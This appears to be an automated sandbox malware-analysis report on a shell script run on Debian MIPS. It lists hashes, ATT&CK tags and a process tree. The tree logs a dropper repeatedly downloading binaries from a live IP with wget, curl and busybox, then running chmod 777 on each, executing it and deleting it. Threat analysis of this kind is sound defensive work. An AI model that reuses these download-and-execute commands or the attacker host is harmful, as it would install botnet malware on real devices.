bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb

Analysis

max time kernel
151s
max time network
155s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
21-11-2024 08:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh
Size

10KB
MD5

7f9d3db559611740d40b8bccb98f2049
SHA1

28310a0e460821cd5a5feac8b12caa9888a8d099
SHA256

bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb
SHA512

ece04554d410979552af51e89a048b680fa4deb2af109261066b0df055cd57a8c32e7600cc3e35f5b35a6795602775103c9ae7c4ad2cf54a8bc4e36a6eeca932
SSDEEP

192:WhV/N+6upNj0sUD8//x89a3lR9lC8gwS8gBhV/N+6KpNj0sL//x89an:6mpNj0sUDslR9M8gL8gbCpNj0sZ

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 23 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid	process
736	chmod
788	chmod
926	chmod
944	chmod
932	chmod
938	chmod
814	chmod
883	chmod
895	chmod
901	chmod
914	chmod
877	chmod
889	chmod
907	chmod
745	chmod
766	chmod
820	chmod
834	chmod
856	chmod
729	chmod
808	chmod
868	chmod
920	chmod

Executes dropped EXE 23 IoCs

Processes:

aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJxuUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjod9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X0wprA81cTZqq8CpDff9xycubkPkIuEDv1lTImbYyQErq2Pjn6pEs2iEgHDh0MmNCWuscyXRP32OWRCwzywQa2MrBL9WmerLEMYaLWvxoCgctsJUTWBClJkUajOFJt7yhBQpkRvbcmmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqqKHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2ejO35p3ilukvfsE6y74InUUnbLJacTwrz8t6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbcmmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqqKHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2ejO35p3ilukvfsE6y74InUUnbLJacTwrz8t6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJxuUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo

Reads runtime system information 23 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

Writes file to tmp directory 23 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for modification	/tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5	curl
File opened for modification	/tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx	curl
File opened for modification	/tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7	curl
File opened for modification	/tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc	curl
File opened for modification	/tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq	curl
File opened for modification	/tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t	curl
File opened for modification	/tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5	curl
File opened for modification	/tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx	curl
File opened for modification	/tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo	curl
File opened for modification	/tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X	curl
File opened for modification	/tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ	curl
File opened for modification	/tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq	curl
File opened for modification	/tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t	curl
File opened for modification	/tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo	curl
File opened for modification	/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB	curl
File opened for modification	/tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l	curl
File opened for modification	/tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv	curl
File opened for modification	/tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc	curl
File opened for modification	/tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e	curl
File opened for modification	/tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc	curl
File opened for modification	/tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ	curl
File opened for modification	/tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e	curl
File opened for modification	/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB	curl

/tmp/bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh
/tmp/bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh
1⤵
PID:698
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:706
- /usr/bin/wget
  wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  2⤵
  PID:708
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:717
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  2⤵
  PID:728
- /bin/chmod
  chmod 777 aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  2⤵
  - File and Directory Permissions Modification
  PID:729
- /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  ./aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  2⤵
  - Executes dropped EXE
  PID:730
- /bin/rm
  rm aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  2⤵
  PID:731
- /usr/bin/wget
  wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  2⤵
  PID:733
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:734
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  2⤵
  PID:735
- /bin/chmod
  chmod 777 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  2⤵
  - File and Directory Permissions Modification
  PID:736
- /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  ./6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  2⤵
  - Executes dropped EXE
  PID:737
- /bin/rm
  rm 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  2⤵
  PID:738
- /usr/bin/wget
  wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  2⤵
  PID:739
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:740
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  2⤵
  PID:744
- /bin/chmod
  chmod 777 uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  2⤵
  - File and Directory Permissions Modification
  PID:745
- /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  ./uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  2⤵
  - Executes dropped EXE
  PID:746
- /bin/rm
  rm uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  2⤵
  PID:747
- /usr/bin/wget
  wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
  2⤵
  PID:748
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:749
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
  2⤵
  PID:762
- /bin/chmod
  chmod 777 d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
  2⤵
  - File and Directory Permissions Modification
  PID:766
- /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
  ./d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
  2⤵
  - Executes dropped EXE
  PID:767
- /bin/rm
  rm d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
  2⤵
  PID:770
- /usr/bin/wget
  wget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
  2⤵
  PID:772
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:777
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
  2⤵
  PID:784
- /bin/chmod
  chmod 777 sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
  2⤵
  - File and Directory Permissions Modification
  PID:788
- /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
  ./sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
  2⤵
  - Executes dropped EXE
  PID:790
- /bin/rm
  rm sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
  2⤵
  PID:792
- /usr/bin/wget
  wget http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l
  2⤵
  PID:794
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:801
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l
  2⤵
  PID:806
- /bin/chmod
  chmod 777 0wprA81cTZqq8CpDff9xycubkPkIuEDv1l
  2⤵
  - File and Directory Permissions Modification
  PID:808
- /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l
  ./0wprA81cTZqq8CpDff9xycubkPkIuEDv1l
  2⤵
  - Executes dropped EXE
  PID:809
- /bin/rm
  rm 0wprA81cTZqq8CpDff9xycubkPkIuEDv1l
  2⤵
  PID:810
- /usr/bin/wget
  wget http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc
  2⤵
  PID:811
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:812
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc
  2⤵
  PID:813
- /bin/chmod
  chmod 777 TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc
  2⤵
  - File and Directory Permissions Modification
  PID:814
- /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc
  ./TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc
  2⤵
  - Executes dropped EXE
  PID:815
- /bin/rm
  rm TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc
  2⤵
  PID:816
- /usr/bin/wget
  wget http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv
  2⤵
  PID:817
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:818
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv
  2⤵
  PID:819
- /bin/chmod
  chmod 777 yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv
  2⤵
  - File and Directory Permissions Modification
  PID:820
- /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv
  ./yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv
  2⤵
  - Executes dropped EXE
  PID:821
- /bin/rm
  rm yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv
  2⤵
  PID:822
- /usr/bin/wget
  wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  2⤵
  PID:823
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:824
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  2⤵
  PID:830
- /bin/chmod
  chmod 777 xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  2⤵
  - File and Directory Permissions Modification
  PID:834
- /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  ./xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  2⤵
  - Executes dropped EXE
  PID:835
- /bin/rm
  rm xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  2⤵
  PID:838
- /usr/bin/wget
  wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  2⤵
  PID:839
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:844
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  2⤵
  PID:853
- /bin/chmod
  chmod 777 mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  2⤵
  - File and Directory Permissions Modification
  PID:856
- /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  ./mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  2⤵
  - Executes dropped EXE
  PID:857
- /bin/rm
  rm mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  2⤵
  PID:860
- /usr/bin/wget
  wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  2⤵
  PID:862
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:866
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  2⤵
  PID:867
- /bin/chmod
  chmod 777 KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  2⤵
  - File and Directory Permissions Modification
  PID:868
- /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  ./KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  2⤵
  - Executes dropped EXE
  PID:869
- /bin/rm
  rm KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  2⤵
  PID:870
- /usr/bin/wget
  wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  2⤵
  PID:871
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:872
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  2⤵
  PID:876
- /bin/chmod
  chmod 777 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  2⤵
  - File and Directory Permissions Modification
  PID:877
- /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  ./1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  2⤵
  - Executes dropped EXE
  PID:878
- /bin/rm
  rm 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  2⤵
  PID:879
- /usr/bin/wget
  wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  2⤵
  PID:880
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:881
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  2⤵
  PID:882
- /bin/chmod
  chmod 777 jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  2⤵
  - File and Directory Permissions Modification
  PID:883
- /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  ./jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  2⤵
  - Executes dropped EXE
  PID:884
- /bin/rm
  rm jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  2⤵
  PID:885
- /usr/bin/wget
  wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  2⤵
  PID:886
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:887
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  2⤵
  PID:888
- /bin/chmod
  chmod 777 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  2⤵
  - File and Directory Permissions Modification
  PID:889
- /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  ./6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  2⤵
  - Executes dropped EXE
  PID:890
- /bin/rm
  rm 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  2⤵
  PID:891
- /usr/bin/wget
  wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  2⤵
  PID:892
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:893
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  2⤵
  PID:894
- /bin/chmod
  chmod 777 xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  2⤵
  - File and Directory Permissions Modification
  PID:895
- /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  ./xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  2⤵
  - Executes dropped EXE
  PID:896
- /bin/rm
  rm xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  2⤵
  PID:897
- /usr/bin/wget
  wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  2⤵
  PID:898
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:899
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  2⤵
  PID:900
- /bin/chmod
  chmod 777 mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  2⤵
  - File and Directory Permissions Modification
  PID:901
- /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  ./mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  2⤵
  - Executes dropped EXE
  PID:902
- /bin/rm
  rm mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  2⤵
  PID:903
- /usr/bin/wget
  wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  2⤵
  PID:904
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:905
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  2⤵
  PID:906
- /bin/chmod
  chmod 777 KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  2⤵
  - File and Directory Permissions Modification
  PID:907
- /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  ./KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  2⤵
  - Executes dropped EXE
  PID:908
- /bin/rm
  rm KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  2⤵
  PID:909
- /usr/bin/wget
  wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  2⤵
  PID:910
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:912
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  2⤵
  PID:913
- /bin/chmod
  chmod 777 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  2⤵
  - File and Directory Permissions Modification
  PID:914
- /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  ./1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  2⤵
  - Executes dropped EXE
  PID:915
- /bin/rm
  rm 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  2⤵
  PID:916
- /usr/bin/wget
  wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  2⤵
  PID:917
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:918
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  2⤵
  PID:919
- /bin/chmod
  chmod 777 jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  2⤵
  - File and Directory Permissions Modification
  PID:920
- /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  ./jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  2⤵
  - Executes dropped EXE
  PID:921
- /bin/rm
  rm jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  2⤵
  PID:922
- /usr/bin/wget
  wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  2⤵
  PID:923
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:924
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  2⤵
  PID:925
- /bin/chmod
  chmod 777 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  2⤵
  - File and Directory Permissions Modification
  PID:926
- /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  ./6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  2⤵
  - Executes dropped EXE
  PID:927
- /bin/rm
  rm 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  2⤵
  PID:928
- /usr/bin/wget
  wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  2⤵
  PID:929
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:930
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  2⤵
  PID:931
- /bin/chmod
  chmod 777 aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  2⤵
  - File and Directory Permissions Modification
  PID:932
- /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  ./aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  2⤵
  - Executes dropped EXE
  PID:933
- /bin/rm
  rm aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  2⤵
  PID:934
- /usr/bin/wget
  wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  2⤵
  PID:935
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:936
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  2⤵
  PID:937
- /bin/chmod
  chmod 777 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  2⤵
  - File and Directory Permissions Modification
  PID:938
- /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  ./6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  2⤵
  - Executes dropped EXE
  PID:939
- /bin/rm
  rm 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  2⤵
  PID:940
- /usr/bin/wget
  wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  2⤵
  PID:941
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:942
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  2⤵
  PID:943
- /bin/chmod
  chmod 777 uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  2⤵
  - File and Directory Permissions Modification
  PID:944
- /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  ./uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  2⤵
  - Executes dropped EXE
  PID:945
- /bin/rm
  rm uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  2⤵
  PID:946
- /usr/bin/wget
  wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
  2⤵
  PID:947

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

